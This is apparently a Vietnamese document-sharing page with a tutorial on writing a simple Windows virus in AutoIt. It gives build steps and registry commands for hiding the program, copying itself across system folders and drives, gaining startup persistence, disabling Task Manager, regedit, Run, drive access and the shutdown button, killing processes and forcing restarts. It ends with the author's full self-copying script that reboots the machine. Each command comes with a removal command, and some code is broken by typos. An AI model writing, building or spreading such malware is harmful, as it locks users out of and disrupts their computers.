Cách viết 1 virus đơn giản

Chia sẻ: Lê Văn | Ngày: | Loại File: DOC | Số trang:7

0
409
lượt xem
102
download

Cách viết 1 virus đơn giản

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tài liệu tham khảo cách viết một chương trình virus đơn giản

Chủ đề:
Lưu

Nội dung Text: Cách viết 1 virus đơn giản

  1. Thanhcuong1990@gmail.com Để viết một chương trình virus đơn giản,đầu tiên các bạn phải down chương trình về tại đây AutoIt Script Home Page Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe *Chú ý: +Khi edit 1 một con virus bắt buộc phải nhấn phải chuột rồi nhấn edit script, chứ nếu nhấn chuột trái như bình thường là bạn sẽ tự dính con virus mà bạn làm ra đó +Không nên kiếm ebook autoit vì nó kô hữu dụng cho bạn đâu, nếu muốn học sâu và rộng hơn thì bạn bắt buộc phải đọc trong file help của chương trình +Icon của chương trình bắt buộc kô được đẽ mặc định vì các trình virus sẽ phát hiện +Các lệnh mình sẽ làm nổi lên Nhưng gì mình viết lên đây chỉ mang tính chất tham khảo.Yêu cầu các bạn không dùng những gì mình viết lên đây để phá người khác Bắt đầu: Bước 1: Coppy các code từ hoalong77 Bước 2: Tạo 1 file .au3 Bước 3:Edit scirpt Bước 4 Paste code vào Bước 5:Convert file au3 --> exe (cái này quan trọng) Nếu đây là lần đâu tiên bạn convert file au3 --> exe thì phải làm theo các bước đó, nhưng về sau bạn chỉ cần nhấn phải chột vào file au3 và nhấn compile script là file exe sẽ compile ngay tại thư mục chứa file au3 ^^
  2. Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có: #Notrayicon ---> để kô hiện chương trình ở taskbar,có nghĩa là nó sẽ chạy ẩn trong Windown FileCopy(@ScriptDir & "\***.exe","C:\WINDOWS",1) ---> "***" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp.Lưu ý:Tên virus này bạn sẽ tạo ra lúc biên dich chương trình thành file .exe Lệnh khắc phục: FileDelete("C:\Windows\*****.exe") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run","explorer","REG_SZ",@WindowsDir & "\*****.exe") ---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên Lệnh khắc phục: RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run","explorer") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System","DisableTaskMgr","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System","DisableTaskMgr","REG_DWORD","1") ----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính Lệnh khắc phục: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System","DisableTaskMgr") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\System","DisableTaskMgr") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System","DisableRegistryTools","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System","DisableRegistryTools","REG_DWORD","1") ----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính Lệnh khắc phục: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System","DisableRegistryTools") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur
  3. rentVersion\Policies\System","DisableRegistryTools") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoRun","REG_DWORD","1") ----> lệnh này sẽ giúp làm mất nút run trong windows Lệnh khắc phục: RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NoRun") RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete"," RED_DWORD","1") ----->Lệnh này sẽ làm vô hiệu hoá thùng rác Lệnh khắc phục: RegDelete("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","671088 63") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108 863") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863") ----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa Lệnh khắc phục: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoViewOnDrive") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NoViewOnDrive") RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoDrives") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","NoDrives")
  4. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoClose","REG_DWORD","1") ---> lệnh này làm mất nút Shutdown ở Start Lệnh khắc phục: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoClose") Lệnh reset máy: Các ban cần lưu ý với các lệnh reset máy vì nó sẽ reset máy của ban liện tục mỗi khi bạn vào Windown Shutdown(thông số) Các thông số có thể có là +0: Đổi user (hay thường gọi là log off) +1: Tắt máy (shutdown) +2: reset máy(restart) +4: Force +8: Power down +32: Stanby +64: Hibernate VD: Shutdown(2) ---> reset máy Lệnh đợi, dừng: Sleep(seconds) VD: Sleep(3000) ---> Dừng 3 giây Lệnh kô cho mỡ 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó) $VA = ProcessExists("iexplore.exe") $RA = ProcessClose("iexplore.exe") $BU = ProcessExists("winamp.exe") $BA = ProcessClose("winamp.exe") While 1 if $VA then $RA $RA = ProcessClose("iexplore.exe") if $BU then $BA $BA = ProcessClose("winamp.exe") WEnd ----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
  5. ProcessClose("iexplorer.exe") --> đóng ngay lập tức EndIf Còn đây la một con virus nhỏ mà mình đã tự viết: #cs ---------------------------------------------------------------------------- Author: hoalong77 Script Function: Template AutoIt script. #ce ---------------------------------------------------------------------------- ; Script Start - Add your code below here #Notrayicon FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1) FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1) FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1) FileCopy(@ScriptDir & "\Setup.exe","D:\",1) FileCopy(@ScriptDir & "\Setup.exe","E:\",1) FileCopy(@ScriptDir & "\Setup.exe","F:\",1) FileCopy(@ScriptDir & "\Setup.exe","G:\",1) FileCopy(@ScriptDir & "\Setup.exe","H:\",1) FileCopy(@ScriptDir & "\Setup.exe","J:\",1) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe") While 1 FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)
  6. FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1) FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1) FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1) FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1) FileCopy(@ScriptDir & "\Setup.exe","D:\",1) FileCopy(@ScriptDir & "\Setup.exe","E:\",1) FileCopy(@ScriptDir & "\Setup.exe","F:\",1) FileCopy(@ScriptDir & "\Setup.exe","G:\",1) FileCopy(@ScriptDir & "\Setup.exe","H:\",1) FileCopy(@ScriptDir & "\Setup.exe","J:\",1) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe") WEnd Sleep(1000) RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System","DisableTaskMgr","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System","DisableTaskMgr","REG_DWORD","1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System","DisableRegistryTools","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System","DisableRegistryTools","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoRun","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoControlPanel","REG_DWORD","1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoClose","REG_DWORD","1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","671088 63")
  7. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108 863") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863") RegWrite(" HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoDesktop","RED_DWORD","1") RegWrite("[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","Notraycontextmenu","RED_DWORD","1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer","NoFind","RED_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ BitBucket","NukeOnDelete","RED_DWORD","1") RegWrite("HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069- A2D8-08002B30309D}","RED_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069- A2D8-08002B30309D}","RED_DWORD","1") RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","REG_SZ ","0") RegWrite("HKEY_CURRENT_USER\ Control Panel\ Desktop","MinMaxClose","RED_DWORD ","1") RegWrite("HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartM enuMorePrograms","RED_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartM enuMorePrograms","RED_DWORD","1") Slepp(1000) Shutdown(2)
Đồng bộ tài khoản